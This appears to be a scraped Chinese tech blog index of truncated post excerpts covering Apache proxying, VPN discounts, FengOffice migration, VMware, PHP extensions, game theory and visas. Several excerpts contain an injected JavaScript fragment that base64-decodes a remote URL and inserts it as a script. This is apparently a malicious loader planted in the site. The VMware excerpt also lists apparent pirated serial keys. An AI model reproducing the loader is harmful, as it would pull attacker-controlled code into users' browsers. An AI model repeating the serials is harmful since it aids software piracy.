版本:
apache2.2 /urs/local/apache2/
tomcat7
1:检查apache有没有mod_proxy模块
没有的话需要自己编译:
(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1
国庆VPN商家优惠促销汇总
双节各大VPN商家提供的VPN促销优惠:
1、CocoVPN (进入CocoVPN官网购买)
优惠码:goy2
优惠幅度:88折
有效期:至10月10号
2、DearVPN (进入DearVPN官网购买)
优惠码:ZQGQKL
优惠幅度:7折
有效期:9月29号 - 10月4号 ,前30有效
3、豆荚VPN (进入豆荚VPN官网购买)
活动1:赠优惠券—活动期间购买套餐,赠送优惠券(优惠券只能针对下次购买,本次不可使用)
套餐类型
优惠券赠送...
fengoffice迁移
版本:FengOffice(OpenGoo)1.7.3
Linux
我想很少有人使用FengOffice吧,但是团果科技的OA就是使用的这个。一开始迁移后,因为权限问题,页面打开空白。成功的方式如下:
按官方的说明,用phpmyadmin导出数据库然后再导入,然后直接复制FengOffice的安装目录,几经失败,最终成功的方法如下:
1、首先备份FengOffice的数据库,执行以下命令:
mysqldump -u root - h localhost -p -r c:\data.txt -B feng...
Mysql日志相关
http://www.blogjava.net/dongbule/archive/2010/09/04/331050.html
http://www.mysqlsystems.com/2009/11/mysql-audit-access-log.html
http://blog.sina.com.cn/s/blog_406127500100pvar.html(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1
VMware Workstation\VMWare Player
下载VMWare Workstation
激活虚拟机VMware Workstation 8可以使用以下有效的VMware Workstation 8序列号:
MV4YN-0L38Q-2ZK60-XUA7K-AAZ18
JC6AP-D4H0P-TZ131-4A2QM-8CNP7
0U6UU-6AJDL-RZTK9-230Q0-8ARJQ
JG2TD-DJL95-FZZZ8-DU1NH-33GH7
如何单独下载VMWare Tools?
进入此处单独下载各个client的适用工具
http://softwareupdate.vmware.com/cds/vmw-desktop/
可查看此处(function(){var a=document.head||...
enable mbstring, gd module in php
遇到出错PHP Fatal error: Call to undefined function mb_convert_encoding()
uname -a 查看CentOS的版本,得到是32位i386的
rpm -qa | grep php 查看已安装的扩展,果然没有mbstring,同时得知软件版本均为xxx-5.3.3-1.el5_7.3
wget http://rpm.pbone.net/.........php53-mbstring-5.3.3-1.el5_7.3.i386.rpm
rpm -iv xxx安装
/etc/rc.d/init.d/httpd restart 重启apache
ps 如果没有安装php common,也...
博弈论基础知识
另附资料: http://www.math.ucla.edu/~tom/Game_Theory/Contents.html
有一种很有意思的游戏,就是有物体若干堆,可以是火柴棍或是围棋子等等均可.两个人轮流从堆中取物体若干,规定最后取光物体者取胜.这是我国民间很古老的一个游戏,别看这游戏极其简单,却蕴含着深刻的数学原理.下面我们来分析一下要如何才能够取胜. 按照游戏规则(取物规则)的不同,博弈游戏可以分为三类: 巴什博奕, 威佐夫博奕, 尼姆博奕
(一...
The STAR Principle
The STAR principle is an excellent guide for structuring a rounded example/piece of evidence. It’s an acronym and corresponds to:
Situation – what was the situation, the setting?
Task – what was to be achieved, what was the goal?
Action – what did you do?
Result – what was the outcome, the result?
Here is an example,
A poor statement example:
‘I am an excellent leader and bu...
如何办理西班牙签证
第一次,真不知道干嘛。谨记,万事早准备就好~
http://www.maec.es/subwebs/Consulados/Shanghai/es/home/Paginas/home_shanghai.aspx
http://www.eueueu.com/forums/15506/ShowPost.aspx
http://blog.sina.com.cn/s/blog_5582311c0100kgks.html
http://www.eueueu.com/forums/169655/ShowPost.aspx(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM...
没写清楚的MS笔试题
char * removeSpace(char *p)
{
bool restart = true;
char* r = p;
char* s = p;
while (*p != '\0')
{
if(restart){
while(isSpace(*p)) p++;
restrart = false;
}
if(!isSpace(*p)&&!isNewline(*p))
*r++ = *p++;
else if (isSpace(*p))
{...